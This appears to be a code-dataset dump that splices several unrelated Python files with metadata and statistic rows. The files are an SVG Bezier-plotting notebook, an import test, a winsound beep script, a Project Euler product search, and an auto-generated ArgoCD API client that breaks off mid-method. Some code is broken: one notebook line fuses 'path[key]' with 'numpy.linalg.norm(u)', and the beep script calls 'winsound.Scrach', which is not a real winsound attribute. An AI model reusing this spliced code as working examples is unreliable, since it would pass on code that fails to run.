e1890a41d0daf9a44a4d1e0a6c5d775f8ab7691b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[93]:
from svg.path import parse_path
from svg.path.path import Line
from xml.dom import minidom
import numpy as np
import matplotlib.pyplot as plt
# Learned from
# https://python5.com/q/twovjmxc
# In[54]:
# read the SVG file
doc = minidom.parse('B_sample.svg')
path_strings = [path.getAttribute('d') for path
in doc.getElementsByTagName('path')]
doc.unlink()
# In[55]:
path_strings
# In[56]:
path_strings[0]
# In[57]:
parse_path(path_strings[0])
# In[59]:
for path_string in path_strings:
path = parse_path(path_string)
for e in path:
if type(e).__name__ == 'Line':
x0 = e.start.real
y0 = e.start.imag
x1 = e.end.real
y1 = e.end.imag
print("(%.2f, %.2f) - (%.2f, %.2f)" % (x0, y0, x1, y1))
# In[61]:
path=parse_path(path_strings[0])
key=0
path[key]
# In[62]:
type(path[key]).__name__
# In[63]:
path[key].start.real
# In[64]:
path[key].start.imag
# In[65]:
key=1
path[key]
# In[66]:
type(path[key]).__name__
# In[67]:
path[key].start.real
# In[68]:
path[key].start.imag
# In[72]:
def cubic_bezier_converter(start, control1, control2, end):
original_data = np.array([start, control1, control2, end])
cubic_bezier_matrix = np.array([
[-1, 3, -3, 1],
[ 3, -6, 3, 0],
[-3, 3, 0, 0],
[ 1, 0, 0, 0]
])
return_data = cubic_bezier_matrix.dot(original_data)
return (lambda t: np.array([t**3, t**2, t, 1]).dot(return_data))
# Learned from
# https://stackoverflow.com/questions/36971363/how-to-interpolate-svg-path-into-a-pixel-coordinates-not-simply-raster-in-pyth
# In[83]:
block=0
n_dots=100
key=0
path=parse_path(path_strings[block])
dat=path[key]numpy.linalg.norm(u)
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[84]:
block=0
n_dots=100
key=1
path=parse_path(path_strings[block])
dat=path[key]
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[85]:
block=0
n_dots=100
key=2
path=parse_path(path_strings[block])
dat=path[key]
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[86]:
block=0
n_dots=100
key=3
path=parse_path(path_strings[block])
dat=path[key]
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[87]:
block=0
n_dots=100
key=4
path=parse_path(path_strings[block])
dat=path[key]
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[98]:
diff_np=start_np-end_np
n_dots=np.round(np.linalg.norm(diff_np))
block=0
n_dots=100
key=3
path=parse_path(path_strings[block])
dat=path[key]
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[ ]:
| 23.950464
| 125
| 0.666882
| 1,294
| 7,736
| 3.779753
| 0.1051
| 0.055817
| 0.066244
| 0.058884
| 0.810468
| 0.779391
| 0.765488
| 0.765488
| 0.765488
| 0.757514
| 0
| 0.045834
| 0.148268
| 7,736
| 322
| 126
| 24.024845
| 0.696464
| 0.11789
| 0
| 0.756579
| 0
| 0
| 0.020393
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.032895
| null | null | 0.006579
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
18c0f8ab989cf3a9cb0ce31834a492c42eec765a
| 139
|
py
|
Python
|
jupyterlab_autoversion/tests/test_all.py
|
ceball/jupyterlab_autoversion
|
d337436e5e7573af71bc0cd111a72955126458f0
|
[
"Apache-2.0"
] | 60
|
2018-08-30T02:07:57.000Z
|
2022-03-03T15:00:39.000Z
|
jupyterlab_autoversion/tests/test_all.py
|
ceball/jupyterlab_autoversion
|
d337436e5e7573af71bc0cd111a72955126458f0
|
[
"Apache-2.0"
] | 61
|
2018-08-24T22:55:48.000Z
|
2022-03-30T13:07:48.000Z
|
jupyterlab_autoversion/tests/test_all.py
|
ceball/jupyterlab_autoversion
|
d337436e5e7573af71bc0cd111a72955126458f0
|
[
"Apache-2.0"
] | 8
|
2019-03-03T07:29:17.000Z
|
2022-03-30T12:38:59.000Z
|
# for Coverage
from jupyterlab_autoversion import * # noqa: F401, F403
from jupyterlab_autoversion.extension import * # noqa: F401, F403
| 34.75
| 66
| 0.776978
| 17
| 139
| 6.235294
| 0.588235
| 0.264151
| 0.471698
| 0.339623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 0.151079
| 139
| 3
| 67
| 46.333333
| 0.79661
| 0.330935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e1310296094d4f0bb4853aafaee0f2cf228fc20c
| 431
|
py
|
Python
|
Random Codes/import winsound.py
|
rafaelleitedasilva/Python
|
2fbd450bdfd770a2bd0f0fd65d667a1b5b4d30d9
|
[
"MIT"
] | null | null | null |
Random Codes/import winsound.py
|
rafaelleitedasilva/Python
|
2fbd450bdfd770a2bd0f0fd65d667a1b5b4d30d9
|
[
"MIT"
] | null | null | null |
Random Codes/import winsound.py
|
rafaelleitedasilva/Python
|
2fbd450bdfd770a2bd0f0fd65d667a1b5b4d30d9
|
[
"MIT"
] | null | null | null |
import winsound
b=winsound.Beep
x=winsound.Scrach
x(100, 1000)
b(1000,100)
b(700,100)
b(500,100)
b(300,100)
b(700,100)
b(100,100)
b(1000,100)
b(700,100)
b(500,100)
b(300,100)
b(200,100)
b(100,100)
b(1000,100)
b(700,100)
b(500,100)
b(300,100)
b(200,100)
b(100,100)
b(1000,100)
b(700,100)
b(500,100)
b(500,100)
b(200,100)
b(100,100)
b(1000,100)
b(700,100)
b(500,100)
b(300,100)
b(200,100)
b(3000,100)
| 12.676471
| 18
| 0.617169
| 101
| 431
| 2.633663
| 0.128713
| 0.43609
| 0.157895
| 0.225564
| 0.785714
| 0.763158
| 0.763158
| 0.763158
| 0.763158
| 0.763158
| 0
| 0.53168
| 0.157773
| 431
| 34
| 19
| 12.676471
| 0.201102
| 0
| 0
| 0.852941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.029412
| 0
| 0.029412
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e1ab6fb66b56899bf4385b65ab78fb2590571507
| 1,323
|
py
|
Python
|
e008-largest-product.py
|
bayramcicek/mini-programs
|
3f876e3274b7beeb5e7413ac9c5275813d9f0d2d
|
[
"Unlicense"
] | null | null | null |
e008-largest-product.py
|
bayramcicek/mini-programs
|
3f876e3274b7beeb5e7413ac9c5275813d9f0d2d
|
[
"Unlicense"
] | null | null | null |
e008-largest-product.py
|
bayramcicek/mini-programs
|
3f876e3274b7beeb5e7413ac9c5275813d9f0d2d
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/python3.6
# created by cicek on 12.10.2018 15:09
digits = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
d_list = list(digits)
i, res = 0, 1
product_array = []
while ((i+12) < len(d_list)):
for x in range(0, 13):
res *= int(d_list[i+x])
product_array.append(res)
res = 1
i += 1
product_array.sort()
print(product_array[-1])
| 57.521739
| 1,011
| 0.900983
| 58
| 1,323
| 20.431034
| 0.586207
| 0.040506
| 0.021941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.820513
| 0.056689
| 1,323
| 22
| 1,012
| 60.136364
| 0.129006
| 0.042328
| 0
| 0
| 0
| 0
| 0.791139
| 0.791139
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83601ffd91c0e7e4353a5bd329b27dbbf3b54a3b
| 49,691
|
py
|
Python
|
argocd_client/api/repository_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2021-09-29T11:57:07.000Z
|
2021-09-29T11:57:07.000Z
|
argocd_client/api/repository_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2020-09-09T00:28:57.000Z
|
2020-09-09T00:28:57.000Z
|
argocd_client/api/repository_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 2
|
2020-10-13T18:31:59.000Z
|
2021-02-15T12:52:33.000Z
|
# coding: utf-8
"""
Consolidate Services
Description of all APIs # noqa: E501
The version of the OpenAPI document: version not set
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from argocd_client.api_client import ApiClient
from argocd_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class RepositoryServiceApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_repository(self, body, **kwargs): # noqa: E501
"""CreateRepository creates a new repository configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_repository(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param V1alpha1Repository body: Repository definition (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_repository_with_http_info(body, **kwargs) # noqa: E501
def create_repository_with_http_info(self, body, **kwargs): # noqa: E501
"""CreateRepository creates a new repository configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_repository_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param V1alpha1Repository body: Repository definition (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1alpha1Repository, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_repository" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_repository`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1Repository', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_repository(self, repo, **kwargs): # noqa: E501
"""DeleteRepository deletes a repository from the configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_repository(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_repository_with_http_info(repo, **kwargs) # noqa: E501
def delete_repository_with_http_info(self, repo, **kwargs): # noqa: E501
"""DeleteRepository deletes a repository from the configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_repository_with_http_info(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'force_refresh'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_repository" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo' is set
if self.api_client.client_side_validation and ('repo' not in local_var_params or # noqa: E501
local_var_params['repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo` when calling `delete_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repo' in local_var_params:
path_params['repo'] = local_var_params['repo'] # noqa: E501
query_params = []
if 'force_refresh' in local_var_params and local_var_params['force_refresh'] is not None: # noqa: E501
query_params.append(('forceRefresh', local_var_params['force_refresh'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_app_details(self, source_repo_url, body, **kwargs): # noqa: E501
"""GetAppDetails returns application details by given path # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_app_details(source_repo_url, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_repo_url: RepoURL is the repository URL of the application manifests (required)
:param RepositoryRepoAppDetailsQuery body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RepositoryRepoAppDetailsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_app_details_with_http_info(source_repo_url, body, **kwargs) # noqa: E501
def get_app_details_with_http_info(self, source_repo_url, body, **kwargs): # noqa: E501
"""GetAppDetails returns application details by given path # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_app_details_with_http_info(source_repo_url, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_repo_url: RepoURL is the repository URL of the application manifests (required)
:param RepositoryRepoAppDetailsQuery body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RepositoryRepoAppDetailsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'source_repo_url',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_app_details" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_repo_url' is set
if self.api_client.client_side_validation and ('source_repo_url' not in local_var_params or # noqa: E501
local_var_params['source_repo_url'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `source_repo_url` when calling `get_app_details`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `get_app_details`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_repo_url' in local_var_params:
path_params['source.repoURL'] = local_var_params['source_repo_url'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{source.repoURL}/appdetails', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RepositoryRepoAppDetailsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_helm_charts(self, repo, **kwargs): # noqa: E501
"""get_helm_charts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_helm_charts(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RepositoryHelmChartsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_helm_charts_with_http_info(repo, **kwargs) # noqa: E501
def get_helm_charts_with_http_info(self, repo, **kwargs): # noqa: E501
"""get_helm_charts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_helm_charts_with_http_info(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RepositoryHelmChartsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'force_refresh'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_helm_charts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo' is set
if self.api_client.client_side_validation and ('repo' not in local_var_params or # noqa: E501
local_var_params['repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo` when calling `get_helm_charts`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repo' in local_var_params:
path_params['repo'] = local_var_params['repo'] # noqa: E501
query_params = []
if 'force_refresh' in local_var_params and local_var_params['force_refresh'] is not None: # noqa: E501
query_params.append(('forceRefresh', local_var_params['force_refresh'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo}/helmcharts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RepositoryHelmChartsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_mixin3(self, repo, **kwargs): # noqa: E501
"""Get returns a repository or its credentials # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mixin3(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_mixin3_with_http_info(repo, **kwargs) # noqa: E501
def get_mixin3_with_http_info(self, repo, **kwargs): # noqa: E501
"""Get returns a repository or its credentials # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mixin3_with_http_info(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1alpha1Repository, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'force_refresh'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_mixin3" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo' is set
if self.api_client.client_side_validation and ('repo' not in local_var_params or # noqa: E501
local_var_params['repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo` when calling `get_mixin3`") # noqa: E501
collection_formats = {}
path_params = {}
